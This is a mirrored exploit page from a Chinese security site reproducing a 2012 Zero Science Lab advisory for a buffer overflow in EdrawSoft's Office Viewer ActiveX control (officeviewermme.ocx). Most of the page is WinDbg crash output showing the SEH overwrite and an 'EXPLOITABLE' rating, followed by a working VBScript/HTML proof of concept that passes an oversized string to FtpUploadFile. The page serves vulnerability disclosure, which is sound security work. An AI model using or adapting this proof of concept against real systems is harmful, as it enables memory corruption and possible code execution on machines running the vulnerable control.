首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
EdrawSoft Office Viewer Component ActiveX 5.6 (officeviewermme.ocx) BoF PoC
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2012-02-01  
EdrawSoft Office Viewer Component ActiveX 5.6 (officeviewermme.ocx) BoF PoC
Vendor: EdrawSoft
Product web page: http://www.edrawsoft.com
Affected version: 5.6.5781
Summary: Edraw Office Viewer Component contains a standard ActiveX control
that acts as an ActiveX document container for hosting Office documents
(including Microsoft Word, Microsoft Excel, Microsoft PowerPoint, Microsoft
Project, and Microsoft Visio documents) in a custom form or Web page. The
control is lightweight and flexible, and gives developers new possibilities
for using Office in a custom solution.
Desc: The ActiveX suffers from a buffer overflow vulnerability when parsing
large amount of bytes to the FtpUploadFile member in FtpUploadFile() function,
resulting memory corruption overwriting severeal registers including the SEH.
An attacker can gain access to the system of the affected node and execute
arbitrary code.
Tested on Microsoft Windows XP Professional SP3 (EN)
-------------------------------------------------------------------------
(6c9c.6c70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=00001015 ecx=000002a0 edx=001b2edc esi=0186e518 edi=01870000
eip=220324cc esp=0186c488 ebp=0186c490 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mindjet\MindManager 10\officeviewermme.ocx -
officeviewermme!DllRegisterServer+0x23bbe:
220324cc 668907          mov     word ptr [edi],ax        ds:0023:01870000=????
0:004> !exchain
0186fa84: 00410041
Invalid exception stack at 00410041
0:004> d esi
0186e518  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e528  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e538  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e548  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e558  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e568  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e578  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e588  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0:004> d edx
001b2edc  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2eec  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2efc  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2f0c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2f1c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2f2c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2f3c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2f4c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0:004> d esp+3000
0186f488  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f498  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4e8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4f8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0:004> !load msec; !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at officeviewermme!DllRegisterServer+0x0000000000023bbe (Hash=0x55146322.0x550a2c22)
User mode write access violations that are not near NULL are exploitable.
-------------------------------------------------------------------------
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab - http://www.zeroscience.mk
Advisory ID: ZSL-2012-5069
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5069.php
Related ID: ZSL-2012-5068
25.01.2012
---
<object classid='clsid:F6FE8878-54D2-4333-B9F0-FC543B1BE1ED' id='ZSL' />
<script language='vbscript'>
targetFile = "C:\Program Files\Mindjet\MindManager 10\officeviewermme.ocx"
prototype  = "Function FtpUploadFile ( ByVal LocalFile As String ,  ByVal RemoteFile As String ) As Boolean"
memberName = "FtpUploadFile"
progid     = "OfficeViewer.OfficeViewer"
argCount   = 2
arg1="defaultV"
arg2=String(4116, "A")
ZSL.FtpUploadFile arg1 ,arg2
</script>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Flash Player MP4 Sequenc
·Apache httpOnly Cookie Disclos
·sudo 1.8.0 - 1.8.3p1 Format St
·Mindjet MindManager 2012 10.0.
·Tracker Software pdfSaver Acti
·frontpage_express2.02 Denial o
·MS12-004 midiOutPlayNextPolyEv
·HP Diagnostics Server magentse
·windows xp sp2 [ arabic] mech
·Sysax Multi Server 5.50 Create
·Sunway Forcecontrol SNMP NetDB
·HP Easy Printer Care XMLCacheM
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved